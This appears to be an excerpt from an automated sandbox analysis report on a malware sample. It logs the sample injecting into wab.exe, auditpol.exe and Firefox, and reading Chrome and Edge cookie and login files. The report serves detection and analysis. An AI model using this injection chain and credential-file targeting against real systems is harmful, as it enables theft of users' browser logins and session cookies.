Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationThread: Direct from: 0x76F02ECC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryInformationToken: Direct from: 0x76F02CAC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtTerminateThread: Direct from: 0x76F02FCC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenKeyEx: Direct from: 0x76F02B9C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationProcess: Direct from: 0x76F02C5C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateMutant: Direct from: 0x76F035CC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtMapViewOfSection: Direct from: 0x76F02D1C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtResumeThread: Direct from: 0x76F036AC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtReadFile: Direct from: 0x76F02ADC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtDelayExecution: Direct from: 0x76F02DDC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryInformationProcess: Direct from: 0x76F02C26			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtResumeThread: Direct from: 0x76F02FBC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateUserProcess: Direct from: 0x76F0371C			Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Windows\SysWOW64\auditpol.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe

Thread register set: target process: 4420

Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe

Thread APC queued: target process: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 401000			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28CF008			Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: uIklAoJgpkP.exe, 00000009.00000000.1936872722.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129294519.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129599501.0000000000D10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Queries volume information: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY